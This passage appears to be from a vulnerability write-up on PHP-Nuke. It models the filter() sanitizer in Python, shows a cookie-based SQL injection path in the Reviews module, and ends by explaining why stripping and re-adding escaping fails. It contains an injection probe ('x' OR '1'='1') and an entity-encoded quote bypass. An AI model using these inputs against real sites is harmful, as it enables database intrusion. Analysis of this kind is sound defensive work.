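    if strip == "nohtml":
        what = check_html(what, strip)
        if type_ != "preview" and save != 1:
            what = html.unescape(what)       # stands in for html_entity_decode(..., ENT_QUOTES)
    if save == 1:
        what = check_words(what)
        what = check_html(what, strip)
        if not magic_quotes:
            what = addslashes(what)
    else:
        what = stripslashes(fix_quotes(what))
        what = check_words(what)
        what = check_html(what, strip)
    return what


def reviews_uname(cookie_field, magic_quotes=True):
    """What reaches WHERE username='...' in the Reviews module: the post says the decoded
    cookie data is slashed first (modelled as addslashes), then filter($cookie[1], "nohtml")."""
    return nuke_filter(addslashes(cookie_field), "nohtml", magic_quotes=magic_quotes)


if __name__ == "__main__":
    probe = "x' OR '1'='1"
    print(repr(reviews_uname(probe)), repr(reviews_uname("x&#39;")))
```

The save=1 branch is no better when magic quotes are on: check_html() strips the slashes the GPC layer added and addslashes() is only re-applied when get_magic_quotes_gpc() is false, so the "escaped" value leaves filter() unescaped. Sanitizers that strip and re-add escaping are not a substitute for binding the value at the query.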
 